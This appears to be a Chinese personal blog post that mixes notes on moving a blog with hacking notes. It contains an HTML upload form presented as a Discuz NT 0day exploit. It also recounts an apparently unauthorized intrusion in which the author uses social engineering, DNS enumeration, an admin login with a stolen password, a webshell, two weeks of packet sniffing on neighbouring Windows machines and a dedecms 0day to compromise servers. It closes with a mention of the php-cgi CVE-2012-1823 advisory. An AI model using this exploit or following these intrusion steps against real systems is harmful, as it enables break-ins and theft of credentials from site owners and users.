有段时间没管Blog，现在记录东西基本在 本地Web Server。

发现外出查看的时候还是不方便，访问原Blog发现已经又被和谐了。

备案这玩儿真烦 又被取消，没办法这次直接搬去US，备你爸的案！

还顺便找回了 不能用多年的域名，意外收获。

之前Blog资料Down到本地备份，要什么EMAIL。

你所浪费的今天，是昨天死去的人奢望的明天。
你所厌恶的现在，是未来的你回不去的曾经。

DISCUZ NT Oday 上传漏洞 。

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=UTF-8″ />
<title>Discuz NT Upload</title>
</head>

<body>

<form METMOD=POST action=”http://bbs.www.cn/tools/ajax.aspx” enctype=”multipart/form-data”>
<input TYPE=”filc” name=”test” >
<input type=”hidden” name=”filename” value=”asasasas”></input>
<input type=”hidden” name=”upload” value=”asasasas”></input>
<input type=”hidden” name=”filename” value=”Jw6IIaYanY7W0695pYVdOA==”></input>
<input type=”submit” value=uploadfile>
</form>
</body>
</html>

今天喵上某站，利用社工拿到了一些账号密码，都放弃了。

但后来回想起whois的时候 对他的dns服务器有点印象不像是常见的dns。

想想dns会不会有意外收获，dnswalk 发现一个oa2008的域名 咿 在查询C段的网站上没有这个域名。

是一个OA系统 很老了，用admin加邮箱里找到的密码登陆成功，利用文件管理器得到shell 同台服务器的哟。

喵了台主机已经2周了 拿到他周边3台了win的机器同时进行嗅探。

也只能够抓到一些零星的用户密码包。

刚好前天出了dedecms的oday，顺利拿多一台linux的服务器。

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞：

http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

貌似没啥危害，因为php做了防范，在cgi这个sapi下是无法使用-r，-f等直接执行命令的参数的。

只有少数几个参数可以使用，因此公告里也就给出了使用-s参数读取源文件的poc。